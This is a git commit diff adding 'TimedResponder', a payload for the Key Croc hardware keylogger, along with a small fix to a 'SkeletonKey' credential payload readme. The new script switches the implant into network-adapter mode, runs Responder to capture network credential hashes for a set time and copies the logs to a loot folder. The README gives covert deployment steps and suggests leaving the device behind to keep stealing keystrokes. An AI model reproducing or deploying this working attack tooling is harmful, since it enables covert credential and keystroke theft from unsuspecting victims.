New payload (Timed Responder), correction to prior payload's readme

1) Created TimedResponder that starts up a responder for a configurable
time and saves results to loot
2) Fixed small issues in readme.md because I always seem to miss
something in markdown

library/credentials/SkeletonKey/README.md

@@ -22,7 +22,9 @@ The Key Croc is ready for deployment.
 3. Cross your fingers and leave
 
 *Turn Skeleton Key*
+
 You get two shots at it! Afterwards, just analyze the log file.
+
 1. Do not disconnect the Key Croc
 2. Enter an incorrect password so you receive "The PIN / password is incorrect - try again" message with the OK button. _Do not click the OK button_ - instead...
 3. Type the secret phrase `skeletonknock`

library/credentials/TimedResponder/README.md

@@ -0,0 +1,31 @@
+# Timed Responder Attack
+### Hang back for a few extra minutes and collect network credentials
+---
+After you've attached the Key Croc, why not take the opportunity to try for some network credentials? Start with your MATCH phrase and a responder attack runs for the total minutes you specify. You'll want to hang around for completion though: the target will briefly lose keyboard connection twice. Afterwards you can leave it behind to continue to quietly gather keystrokes.
+
+The payload was tested on Windows 10.
+
+*Setup*
+1. Connect the Key Croc on your PC in ARMING mode
+2. Place `timedresponder.txt` in the payloads directory
+3. Change the `GATHER_FOR` variable to the number of seconds to run responder
+4. Optionally change the MATCH string to a unique passphrase of your choice
+5. Eject the Key Croc safely
+
+The Key Croc is ready for deployment.
+
+*Deploy*
+1. Connect the Key Croc to target in attack configuration
+2. Look around slyly and make sure you are in the clear for a few minutes
+3. Start responder by typing `__responder`
+4. The Key Croc will go into both HID and RNDIS mode, indicated by LED magenta
+5. While responder is running, the LED will flash with a single yellow blink
+6. The logs will be copied to /root/loot, indicated by a fast white blink
+7. A brief LED flash of green means your attack is complete.
+
+Take the croc with you, or leave it behind to continue stealing keystokes.
+
+*What’s up with the name SaintCrossbow?*
+Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool.
+
+

library/credentials/TimedResponder/timedresponder.txt

@@ -0,0 +1,31 @@
+# Title: Start responder for n minutes while still being in keyboard mode
+#        Note: Not fully covert - allow for brief keyboard outage
+# Author: Saint Crossbow
+# Version: 1.0
+
+MATCH __responder
+
+# Gather for however many minutes (e.g. 120 = 2 minutes)
+GATHER_FOR=120
+
+echo "[*] Starting attack"
+
+LED SETUP
+ATTACKMODE HID RNDIS_ETHERNET RNDIS_SPEED_2000000 &
+sleep 15
+
+LED ATTACK
+/tools/responder/Responder.py -I usb0 -f -w -r -d -F &
+bpid=$!
+sleep $GATHER_FOR
+
+LED CLEANUP
+echo "[*] Stopping attack"
+kill $bpid
+wait $bpid
+
+LED FINISH
+cp /tools/responder/logs/*.log /root/loot/
+ATTACKMODE HID
+sleep 2
+LED OFF